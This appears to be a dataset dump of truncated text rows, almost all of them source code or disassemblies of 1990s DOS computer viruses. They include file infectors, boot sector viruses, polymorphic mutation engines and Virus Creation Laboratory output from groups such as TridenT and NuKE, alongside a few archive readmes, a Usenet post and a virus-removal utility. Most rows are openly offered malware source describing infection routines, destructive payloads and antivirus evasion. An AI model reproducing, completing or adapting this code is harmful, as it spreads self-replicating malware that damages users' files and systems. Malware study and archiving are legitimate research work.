text
stringlengths
0
20k
;% You-name-the-bitch % ; .model tiny .code org 100h pagesize equ (((offset last) - (offset start)) shr 9) + 1 parasize equ (((offset last) - (offset start)) shr 4) + 1 bytesize equ (parasize shl 4) lastpage equ bytesize - (pagesize shl 9) start: push ds ...
;**************************************************************************** ;* Cannabis version 3 ;* ;* Compile with MASM 4.0 ;* (other assemblers will probably not produce the same result) ;* ;* Disclaimer: ;* This file is only for educational purposes. The author takes no ;* responsibility for anything any...
; Chickenchoker Virus by HDKiller ; ; Origianl Variant 127 bytes ; Fixored up Variant 132 bytes ; ; ; This is a trivial variant of a basic sort, no encryption and a nasty payload ; ; Being HDKiller's first virus it wasnt a bad start, though I wouldnt have made ; it destruct...
; ; Cop-Com Virus ; Org 100h Main: Xor Cx,Cx On1: Call CritErr Inc Cx Cmp Cx,10 Jb Infect Push Cs Pop Ds Mov Ah,3ch Lea Dx,Command Xor Cx,Cx ...
- TridenT - This is a collection of 100+ viruses, many of them with the original source code. These viruses were created by the members of the Dutch virus writing group TridenT. The collection is divided into seperate archives to cover the individual members of the group: ...
; ; CyberTech Virus - Strain A John Tardy (C) 1992 ; ; Written in A86 V3.22 ; ; Description : This is a Non-Resident Self-Encrypting .COM file infector ; which infects COM files in the current directory. It will ; remove CHKLIST.CPS from the current directory a...
Code Segment Assume CS:code,DS:code Org 100h startvx proc near mov ah,4eh mov cx,0000h mov dx,offset star_com int 21h mov ah,3dh mov al,02h mov dx,9eh int 21h xchg bx,ax mov ah,40h mov cx,offset endvx - offset startvx mov dx,offset startvx int 21h mov ah,3eh int 21h int 20h szTitleName db' Ch...
page 70,120 Name CIAVIRUS ;************************************ ; CIA Virus (C) 1989 by ; Live Wire ;************************************ code segment assume cs:code progr equ 100h ORG progr main: nop nop nop mov ax,00 ...
; ; Clust2 virus by John Tardy / TridenT ; ; Virus Name: Clust2 ; Aliases: Cluster-II, Circus Clusters-II ; V Status: Released ; Discovery: Not (yet) ; Symptoms: .EXE altered, possible "sector not found" errors on disk-drives, ; decrease in aveable memory ; Origin: The Netherlands ; Eff L...
; ; ; CodeJournal virus, (c)1995 irogen [NuKE] ; ; ; Polymorphic, Resident, Parastic EXE/COM Fast Infector. This is ; another one of my fuck-Invircible viruses. It uses absolutly ; no stealth techniques, yet successfully piggybacks invircible. ; ; Anti-Invircible Code ; ---------------------- ; Completly defeats InV...
cut equ offset len-300h virsize equ offset len-100h memsize equ (virsize+20h)/16+1 xor di,di mov ds,di mov ss,di mov sp,7BF0h mov si,7C00h push si mov ax,3000h ...
title COMVIRUS subttl By Drew Eckhardt subttl Latest revision: 4-28-1991 ;The author of this virus intends it to be used for educational ;purposes only, and assumes no responsibilities for its release, ;dammages resulting from its use, including but not limited to ;equipment dammage or data loss. ;By assembling or ex...
;**************************************************************************** ; Civil War II V1.1 * ; * ; Assembled with Tasm 2.5 * ; (c) 1992 Trident/Dark Helmet, The Netherlands ...
; ; Circus Clusters by John Tardy ; ; This virus is a purely research virus and will not be very able to spread ; itself. It only infects .EXE files smaller than 64K and have a very small ; relocation header, so it can hide itself there. It is fully stealth and it ; only occupies 273 bytes (512-273=239 bytes left for t...
; This Virus is dedicated to Taz - ((Amanda Hugen)) ; Fuck you, Bitch! ; Written by the Weasel! for Sector Infector INC. cr equ 13 ; Carriage return ASCII code lf equ 10 ; Linefeed ASCII code tab equ 9 ...
;########################################################################### # ;# Virus Name: Catch.Me # Size: 371 Bytes # ;# Author: Jerk1N # EMail: jerk1n@trust-me.com # ;########################################################################### # ;# Notes ...
PAGE 60,132 ; XSEG SEGMENT ; Seg=01387H ; Org=00000H ASSUME CS:XSEG XPROC PROC FAR JMP L6551 DEC BX PUSH BX PUSH CX CALL L0009 L0009: POP SI SUB SI,+09H PUSH SI CLD MOV DI,0100H MOV CX,0005H MOVSB JMP L01CE L001A: PUSHF PUSH CS CALL WORD PTR CS:[08C0H] DB 0C3H; RET STI CMP AH,4BH JE L0061 CMP AH,...
;**************************************************************************** ;* Cannabis version 2 ;* ;* Compile with MASM 4.0 ;* (other assemblers will probably not produce the same result) ;* ;* Disclaimer: ;* This file is only for educational purposes. The author takes no ;* responsibility for anything any...
PAGE 60,132 ; ; ; CEMETERY ; ; Created: 4-Mar-91 ; ; data_1e equ 4Ch ; (0000:004C=31h) data_2e equ 4Eh ; (0000:004E=70h) data_3e equ 70h ; (0000:0070=0FF33h) data_4e equ 72h ; (0000:0072=0F000h) data_...
;Ŀ ; Commentator Virus by Glenn... ;Ĵ ; This will be a Parasytic Non-Resident .COM infector. ; It will also infect COMMAND.COM. ; .MODEL TINY Public VirLen,MovLen Code Segment para 'Code' Assum...
;**************************************************************************** ; Civil War II * ; * ; Assembled with Tasm 2.5 * ; (c) 1992 Dark Helmet, The Netherlands ...
page ,132 name V847 title The V-847 virus .radix 16 code segment assume cs:code,ds:code org 100 timer equ 6C olddta equ 80 virlen equ offset endcode - offset start smalcod equ offset endcode - offset ...
; ; CyberTech Virus - Strain A John Tardy (C) 1992 ; ; Written in A86 V3.22 ; ; Description : This is a Non-Resident Self-Encrypting .COM file infector ; which infects COM files in the current directory. It will ; remove CHKLIST.CPS from the current directory a...
name Virus title Disassembly listing of the VHP-648 virus .radix 16 code segment assume cs:code,ds:code org 100 environ equ 2C start: jmp virus . . . virus: push cx ;Save CX mov dx,offse...
Org 0h ; Generate .BIN file Start: Jmp MainVir ; Jump to decryptor code at EOF Db '*' ; Virus signature (very short) ; ; Decryptor procedure ; MainVir: Call On1 ; Push offset ...
;**************************************************************************** ;* Civil War IV v1.1 (minor bugfix version) * ;* * ;* Assembled with Tasm 2.5 * ;* ...
;The Cluster virus is an interesting experiment which works, almost. ;It it what has come to be known as an 'intended' virus, although a ;a very slickly done one. ;Credited to the TridenT virus programming group, Cluster uses some of ;the ideas of the Bulgarian virus known as The Rat. The Rat was deemed ;tricky becaus...
page 70,120 Name CIAVIRUS ;************************************ ; CIA Virus (C) 1989 by ; Live Wire ;************************************ code segment assume cs:code progr equ 100h ORG progr main: nop nop nop mov ax,00 ...
title "CRF1 virus. Born on the Fourth of July. Written by TBSI." page 60,80 code segment word public 'code' assume cs:code,ds:code org 100h main proc;edure ; As referenced in this source listing, Top-Of-File represents location 100h in ; the current memory segment, which is where the viru...
; CODEZERO.ASM -- Code Zero Virus ; Created with Nowhere Man's Virus Creation Laboratory v1.00 ; Written by Nowhere Man virus_type equ 0 ; Appending Virus is_encrypted equ 1 ; We're encrypted tsr_virus equ 0 ; We're not TSR code segment byte public assume cs:code,ds:code,es:code,ss:code org 0100h main pr...
name Virus title Virus; based on the famous VHP-648 virus .radix 16 code segment assume cs:code,ds:code org 100 environ equ 2C start: jmp virus int 20 data label byte ;Data section dtaaddr dd ? ...
;***************************************************************************** ;* CIVIL WAR v1.1 * ;* * ;* Assemble with Tasm 1.01 * ;* ...
page ,132 name CANCER title Cancer - a mutation of the V-847 virus .radix 16 code segment assume cs:code,ds:code org 100 olddta equ 80 virlen equ offset endcode - offset start smalcod equ offset endcode - offset...
PAGE 59,132 ; ; ; COPYR ; ; Created: 1-Jan-80 ; Version: ; Passes: 5 Analysis Options on: AFOP ; ; ; data_1e equ 9Eh ; (996E:009E=0) seg_a segment...
;Ŀ ; THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. [NuKE] PoWeR ; CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN [NuKE] WaReZ ; auToR: aLL [NuKE] MeMeBeRS [NuKE] PoWeR ; [NuKE] THe ReaL PoWeR! [NuKE] WaReZ ; NRLG WRiTTeR: AZRAEL (C) [NuKE]...
; ; Demoralized Youth proudly presents: Creeper v1.0, Original Source ; ; Written by: TORMENTOR ; ; Yez, here it is... It's not like 4096 or Pogue, but it's a virus! ; The reason why I release the original source is that I think I ; can't do much more on this virus... I will start from scratch ; and write a larger...
INTERRUPTS SEGMENT AT 0H ;This is where the keyboard interrupt ORG 9H*4 ;holds the address of its service routine KEYBOARD_INT LABEL DWORD INTERRUPTS ENDS SCREEN SEGMENT AT 0B000H ;A dummy segment to use as the SCREEN ENDS ;Extra Segment ROM_BIOS_D...
; nihilist.asm : [Nihilist] ; Created with Biological Warfare - Version 0.90 by MnemoniX PING equ 0D86Bh PONG equ 043C4h STAMP equ 25 MARKER equ 0F0FFh code segment org 0 assume cs:code,ds:code start: ...
; Neurotic Mutation Engine v1.00 for Neuropath ; by MnemoniX 1994 engine proc near call randomize get_reg_1: mov ax,7 ; counter register call _random inc ax cmp al,4 je ...
; ------------------------------------------------------------------------- ; ; Nekorb v1.5 coded by KilJaeden of the Codebreakers 1998 ; ; ------------------------------------------------------------------------- ; ; Description: `-------------------| Started: 10/06/98 | Finished: 11/06/98 ; ; ...
; ------------------------------------------------------------------------- ; ; Nosnam v1.5 coded by KilJaeden of the Codebreakers 1998 ; ; ------------------------------------------------------------------------- ; ; Description: `-------------------| Started: 07/06/98 | Finished: 09/06/98 ; ; ...
; ; NoLimit Virus by John Tardy / TridenT ; ; Limited version of Servant Virus Version Equ 1 ; Initial release. Org 0h ; Creates a .BIN file. ; This piece of code is located at the begin of the file Start: Jmp MainVir ...
; ========================================================================> ; [Neuropath] by MnemoniX 1994 ; ; * Memory resident .COM infector ; * Polymorphic (engine in neuroeng.asm - lame but effective) ; * Anti-SCAN and CLEAN stealth technique - creates hidden file in ; root directory; when SCAN or CLEAN is r...
; ; Necromonicon Virus by John Tardy ; Org 0h decr: jmp Crypt db 'Carcass' Loopje DB 0e2h db 0fah DecrLen Equ $-Decr Crypt: Push Ax call Get_Ofs Get_Ofs: pop Bp sub Bp,Get_Ofs Mo...
;***************************************************************************** ; #6 Virus * ; * ; Assembled with Tasm 2.5 * ; (c) 1992 Trident/Dark Helmet, The Netherlands * ; * ; The author(s) take(s) no responsibility for any damaged caused by * ; t...
; NO.ASM -- Hides specified files from command that follows ; ====== CSEG Segment Assume CS:CSEG, DS:CSEG, ES:CSEG, SS:CSEG Org 002Ch Environment Label Word ; Segment of Environment is here Org 0080h Parameter Label Byte ; Parameter is here Org 0100h Entry: Jmp Begin ; Entry Point ; Most Data (some more ...
; ------------------------------------------------------------------------- ; ; Nyliram v1.0 coded by KilJaeden of The Codebreakers 1998 ; ; ------------------------------------------------------------------------- ; ; to compile ::] tasm nyliram.asm ; ; to lin...
.radix 16 ;********************************* ;* The Naughty Hacker's virus * ;*VERSION 3.1 (And not the last.)* ;* ( V1594 ) * ;* Finished on the 10.04.1991 * ;* * ;* Glad to meet you friend! * ;* * ;********...
PAGE 59,132 ; ; ; NPOX21 ; ; Created: 28-Sep-92 ; Passes: 5 Analysis Options on: none ; ; data_1e equ 16h data_2e equ 3 ;* data_32e equ 103h ;* data_33e equ 1 ;* seg_a segment byte publi...
;NINJA virus v1.1 _sandoz_ ;I dont believe that NINJA scans, it was developed from Soviet block virus ;code that was aquired late in 1988. For this reason some features are missing ;such as original encryption, which really wont be missed. However some features ;are rather unique. used were System Violator's Virus Mu...
; *** NOT FOR GENERAL DISTRIBUTION *** ; ; ; ; This File is for the Purpose of Virus Study Only! It Should not be Passed ; ; Around Among the General Public. It Will be Very Useful for Learning how ; ; Vi...
PAGE 60,132 ; ; ; NOMNCLTR ; ; Created: 19-Jan-92 ; ; .286c data_1e equ 4Ch ; (0000:004C=0E9h) data_2e equ 84h ; (0000:0084=9Eh) data_3e equ 46Ch ; (0000:046C=66CDh) data_4e equ 3 ; (5C42:0003=0FFF...
; VirusName : Naked Truth ; Country : Sweden ; Author : The Unforiven / Immortal Riot ; Date : 17/09/1993 ; ; This is a mutation of the virus Born on the Fourth of July ; This was written by TBSI. Mcafee scan used to find it as the ; "ash" virus. But I changed on a few bytes, and he's now tricked. ; Dr Alan S...
page 65,132 title The 'New Zealand' Virus (Update) ; ͻ ; British Computer Virus Research Centre ; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England ; Telephone: Domestic 0273-26105, International +44-273-26105 ; ...
page 65,132 title The 'New Zealand' Virus ; ͻ ; British Computer Virus Research Centre ; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England ; Telephone: Domestic 0273-26105, International +44-273-26105 ; ...
PAGE 59,132 ; ; ; NPOX21 ; ; Created: 28-Sep-92 ; Passes: 5 Analysis Options on: none ; ; data_1e equ 16h data_2e equ 3 ;* data_32e equ 103h ;* data_33e equ 1 ;* seg_a segment byte publi...
; Date : 27-1-1989 ; Ver : 1.04 ; Program : Kill the Brain Virus Cseg Segment Para Public 'MyCode' Assume cs:Cseg,ds:Cseg Org 100h Start: Mov dx,offset CRight ;print copyright notice Call DispStr Mov ah,19h ;get current drive Int 21h Mov Drive,al ;save it Call GetDrive ;Get drive if possible Jc ...
; ; NoLimit2 Virus by John Tardy / TridenT ; ; Limited version of Servant Virus ; ; Bugs Fixed from 1: ; With encryption, not all possibilities were used. Solved. Version Equ 2 ; Initial release. Org 0h ; Creates a .BIN file. ; This piece of ...
.model tiny .code org 100h ; Disassembly done by Dark Angel of Phalcon/Skism ; for 40Hex Number 9, Volume 2 Issue 5 start: push ax mov ax,9753h ; installation check int 21h mov ax,ds dec ax ...
; ; Simple com appender destined to be another SillyC ; so im putting the file name in as the virus name .. nuff said ; ; Unscannable by F-Prot & by TBAV with no flags ; Uses a novel way of beating S flag ; ; Scans as a VCL/IVP variant with AVP/DSAV ...
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; ...
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; ...
page 65,132 title The 'Yale' Virus ; ͻ ; British Computer Virus Research Centre ; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England ; Telephone: Domestic 0273-26105, International +44-273-26105 ; ...
; YANKEE2.ASM -- Yankee Doodle ][ ; Created with Nowhere Man's Virus Creation Laboratory v1.00 ; Written by Nowhere Man virus_type equ 0 ; Appending Virus is_encrypted equ 0 ; We're not encrypted tsr_virus equ 0 ; We're not TSR code segment byte public assume cs:code,ds:code,es:code,ss:code org 0100h main...
.MODEL SMALL .CODE comment / Good luck! Vladimir Botchev, CICT-BAS, december 1988 / data_area struc ;Define a pattern for working data ;area DS_save dw ? ES_save dw ? IP_save dw ? CS_save dw ? SS_save dw ? filematch db '*.exe',00h ;Names for files to infect matchall db '*.*',00h ;n...
comment * Designed by "Q" the Misanthrope The "You_Got_It" virus needed to be made. Windows 95 has neglected the floppy boot sector virus long enough. Windows 95 in it's 32 bit protected mode has it's own floppy disk routines and doesn't use int 13 or int 40 anymore. When a floppy boot sector viruses infectes the ...
jmp far ptr loc_2 ;*(07C0:0005) jmp loc_8 ; (00A1) data_27 db 0 data_28 dd 0F000EC59h data_29 dd 9F8000E4h data_30 dd 07C00h ;----------------------------------------------------------------------------- ; INT 13h ;----------------------------------------------------------------------------- push ds...
; The Xhiltar Virus ; By Arsonic[Codebreakers] ; Type: Runtime Appending Com Infector ; Encrypted: Yes ; Polymorphic: Yes ; Time/Date: Yes ; add Attrib: Yes ; Changes Directory's: Yes (dotdot method) ; Anti-Anti-Virus: Yes (anti-heuristics) db 0e9h,0,0 start: call delta delta: pop bp sub bp,offset delta ...
>>> Article From Evolution #2 - YAM '92 Article Title: Kode 4 v1 Virus Author: Soltan Griss ;###################################################################### ;# Name: Kode4 version 1.0 (overwritting stage) ;# Author: Soltan Griss [YAM] ;# ;# Description: What this sucker does is very simple. it overwrite...
;The KILROY one-sector boot sector virus will both boot up either MS-DOS or ;PC-DOS and it will infect other disks. ;This segment is where the first operating system file (IBMBIO.COM or IO.SYS) ;will be loaded and executed from. We don't know (or care) what is there, but ;we do need the address to jump to defined in a...
;--------------------------------------------------------------------------- ;KBM KeyBoard Mouse by Dan Rollins 5-20-85 ; ; This program intercepts keyboard data and creates a bit pattern determined ; according to whether or not certain keys are currently being pressed. ; ; The bit patt...
>>> Article From Evolution #2 - YAM '92 Article Title: Kode 4 v2 Virus Author: Soltan Griss seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h V_Length equ vend-vstart KODE4 proc far start label near ...
;###################################################################### ;# Name: Kode4 version 1.0 (overwritting stage) ;# Author: Soltan Griss [YAM] ;# ;# Description: What this sucker does is very simple. it overwrites ;# the first 46 bytes of all com files in the current ;# director...
memS equ 1 ;model small convertable to COM model ;**************** RUNTIME LIBRARY OF KILLDIANA.COM ************** include lcmac.mac calln macro name call near ptr name endm callp macro name lea dx,name calln print endm callz macro name push si lea si,name calln printz pop si endm dtas struc re...
;************************************************************************; ;* T Virus 25.10.1991 . *; ;* *; ;* " . " 17:18.30 hour *; ;* ...
; KINISON.ASM -- Sam Kinsion Virus ; Created with Nowhere Man's Virus Creation Laboratory v1.00 ; Written by Nowhere Man virus_type equ 0 ; Appending Virus is_encrypted equ 1 ; We're encrypted tsr_virus equ 0 ; We're not TSR code segment byte public assume cs:code,ds:code,es:code,ss:code org 0100h main p...
memS equ 1 ;model small convertable to COM model ;**************** RUNTIME LIBRARY OF KILLDIANA.COM ************** include lcmac.mac calln macro name call near ptr name endm callp macro name lea dx,name calln print endm callz macro name push si lea si,name calln printz pop si endm dgroup group d...
; KINNISON.ASM -- Sam Kinnison virus ; Created by Nowhere Man's Virus Creation Labratory v0.75 ; Written by Nowhere Man virus_type equ 0 code segment 'CODE' assume cs:code,ds:code,es:code,ss:code org 0100h main proc near flag: mov ah,0 nop nop jmp start ; Would be at start of victim nop nop sta...
; KEY-FAKE.ASM -- Fakes keystrokes from internal keyboard buffer. ; ============ CSEG Segment Assume CS:CSEG Org 0100h Entry: Jmp Initialize ; Most Resident Data ; ------------------ db 'KEY-FAKE (C) Copyright Charles Petzold, 1985' SearchLabelEnd Label Byte OldInterrupt16 dd 0 Pointer dw Offset KeyStrok...
.model tiny .code org 100h start_virus: and al,21h mov cx,100h ;for tha tbav abc: ; loop abc ; ;anti_disassembler mov cx,09ebh mov ax,0fe05h jmp $-2 add ah,03bh jmp $-10 ;anti_debugg...
seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h V_Length equ vend-vstart KODE4 proc far start label near db 0E9h,00h,00h vstart equ $ ...
title Display Registers page 65,131 include struct.mac ; ; regdisp.asm ; ; Displays all the 8086 registers on the right side of the screen. ; The registers are sampled and displayed roughly 18 times per second. ; Toggle on and off by holding down both shift keys. ; To use with the monochromatic monitor, DISP_BUFF...
PAGE 72,132 TITLE Virus "RUSH HOUR" (p) Foxi, 1986 NAME VIRUS ABS0 SEGMENT AT 0 ORG 4*10H VIDEO_INT DW 2 DUP (?) ; VIDEO INTERRUPT ; VECTOR ORG...
;***************************************************************************** ;* * ;* The Ritzen Virus * ;* * ;* (c) '93, by S.A.R. (Students Agains Ritzen) / TridenT * ;* * ;***************************************************************************...
; ; STEALTH group ۰ ; presents ۰ ;۰ ; JAN 1995 ; ; INFECTED VOICE. Issue 4. January 1995. (C) STEALTH group, Kiev 148, Box 10. ; THE...
; ; RSV - written by Conzouler 1995 ; ; memory resident ; com-append on execute ; no tb-flags ; no impressive features... ; .model tiny .code .286 org 100h psize equ (offset last - offset entry) / 10h + 1 size equ offset last - offset entry entry: db 0e9h,0,0 start: call go...
start: and al,21h ;anti_disassembler & anti_debugger mov cx,09ebh mov ax,0fe05h jmp $-2 add ah,03bh jmp $-10 ;anti_debugger mov ax,3503h ;save int 3h in bx int 21h ;do it mov ah,25h ;set new ...
;****************************************************************************** ; ; RTL4 / WEDDEN DAT... VIRUS ; ;****************************************************************************** ; ; "If a weaking linkage found, eliminate... ; Hear the cities fearfull roar!" ; ; Now in front of you lies another sour...
; RHINCE 2.0, by Rhincewind [Vlad] ; ; This is the accompanying textfile for RHINCE v2.0, where RHINCE stands for ; "Rickety and Hardly Insidious yet New Chaos Engine". There's been quite ; a lot of feedback on the original release, both positive and negative. The ; negative reviews mainly dealt with the engine being s...
; VirusName : CARPE DIEM! - Seize the day ; Origin : Sweden ; Author : Raver ; Date : 16/11/93 ; Well this is my (Raver's) first scratch virus. ; This virus is mainly made for educational purpose (my own!). ; It's pretty well commented in an easy way so even you folks ; with little experience with assembler...
Official Alliance Virii Archives: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Maintained and Managed by Rhys and Hasy This is one of many ZIP archive files that, all together, contain literally thousands of working, running virii. Enjoy. All you must do to avoid infection is make sure that no idiot runs these. These ...
; RANDOM.ASM -- Random To all Ports ; Written by The Wz! virus_type equ 0 ; Appending Virus is_encrypted equ 1 ; We're encrypted tsr_virus equ 0 ; We're not TSR code segment byte public assume cs:code,ds:code,es:...
From netcom.com!ix.netcom.com!netnews Sat Nov 12 17:11:15 1994 Xref: netcom.com alt.comp.virus:200 Path: netcom.com!ix.netcom.com!netnews From: Zeppelin@ix.netcom.com (Mr. G) Newsgroups: alt.comp.virus Subject: Re:Riot Date: 12 Nov 1994 03:37:30 GMT Organization: Netcom Lines: 171 Distribution: world Message-ID: <3a1d9...
;Rizwi Virus from the TridenT research group. ;Memory resident .COM infector. ;This virus is only active after the spring of 1994. ;When active, it infects .COM files on execution, and keeps ;track of the number of files that it has infected. While it has ;infected between 0C8h and 0f0h files, it displays the mess...
PAGE 59,132 ;************************************* ;**The Rat Virus - Overwriting ** ;** Non-Resident ** ;** Com File Infector** ;** Author: -Ajax- ** ;** This virus is 92 bytes long ** ;** Because it is made in 1992 :) ** ;**/\/\/\/\/\/\/\/\/\/\/\/\/\/\...
; Virusname: Ravage ; Origin: Sweden ; Author: Metal Militia ; This virus can be found with any anti-virus program, since it's been ; around for a while now. (SCAN/TB-SCAN/F-PROT/SOLOMON, that is..) ; It's a resident .COM and .EXE infector, without any encryption or ; stealth capabilities. It infects when you execu...
ORG 0100H ; .. Virii label Near ; Start adress CS:0100H ; Mutate Proc Near ; The Decryption/encryption code begin here .. Cmp Ax,01100H ; J_N_E: ; Adress of the byte to change JA ByeBye ; Will change...
page 70,120 Name VIRUS ;************************************************************************* ; Program Virus Ver.: 1.1 ; Copyright by R. Burger 1986 ; This is a demonstration program for computer ; viruses. It has the ability to replicate itself, ; and the...
; VirusName: Raping Betrayals ; Country : Sweden ; Author : The Unforgiven / Immortal Riot ; Date : 15/09/1993 ; ; ; This is an mutation of Misery from Immortal Riot. ; I mutated this one, cuz Mcafee scan grabbed it ; within one month after we released it. So, now ; "Misery" is called "Raping Betrayls". Many ; t...
; A pseudo random numbers generator ; for use with the MuTation Engine <tm> ; Version 1.01 (26-10-91) ; (C) 1991 CrazySoft, Inc. .model tiny .code public rnd_init, rnd_get, rnd_buf, data_top rnd_init: push ds si dx cx bx xor ah,ah int 1ah in al,[40h] mov ah,al in al,[40h] xor ax,cx xor dx,ax push cs ...